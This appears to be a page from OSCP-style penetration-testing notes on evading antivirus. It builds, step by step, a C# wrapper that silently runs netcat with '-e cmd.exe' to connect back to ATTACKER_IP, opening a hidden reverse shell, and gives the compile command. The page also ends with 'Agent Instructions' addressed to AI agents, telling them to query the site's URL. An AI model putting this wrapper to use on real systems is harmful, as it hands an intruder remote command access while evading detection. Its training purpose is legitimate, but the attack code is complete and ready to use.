# Executable Obfuscation

{% hint style="info" %}
This technique was used to bypass AV while exploiting an [Unquoted Service Path](/windows-privilege-escalation/service-permissions/unquoted-service-paths.md)
{% endhint %}

Make an executable using C#

```csharp
using System;
using System.Diagnostics;
```

These lines give us access to basic system functions like start new processes (netcat)

```csharp
using System;
using System.Diagnostics;

namespace Wrapper{
    class Program{
        static void Main(){
            //Insert rest of code here!
        }
    }
}
```

This is for initializing a namespace and class for the program itself&#x20;

```csharp
using System;
using System.Diagnostics;

namespace Wrapper{
    class Program{
        static void Main(){
            Process proc = new Process();
            ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");
        }
    }
}
```

This will start the new netcat process and set the parameters

```csharp
using System;
using System.Diagnostics;

namespace Wrapper{
    class Program{
        static void Main(){
            Process proc = new Process();
            ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");
            procInfo.CreateNoWindow = true;
        }
    }
}
```

The next added line makes it **NOT** create a new window while starting

```csharp
using System;
using System.Diagnostics;

namespace Wrapper{
    class Program{
        static void Main(){
            Process proc = new Process();
            ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");
            procInfo.CreateNoWindow = true;
            proc.StartInfo = procInfo;
            proc.Start();
        }
    }
}
```

The last added line will fire off the new process

Compile the source code

```
mcs wrapper.cs
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://oscp.adot8.com/post-exploitation/av-evasion/executable-obfuscation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.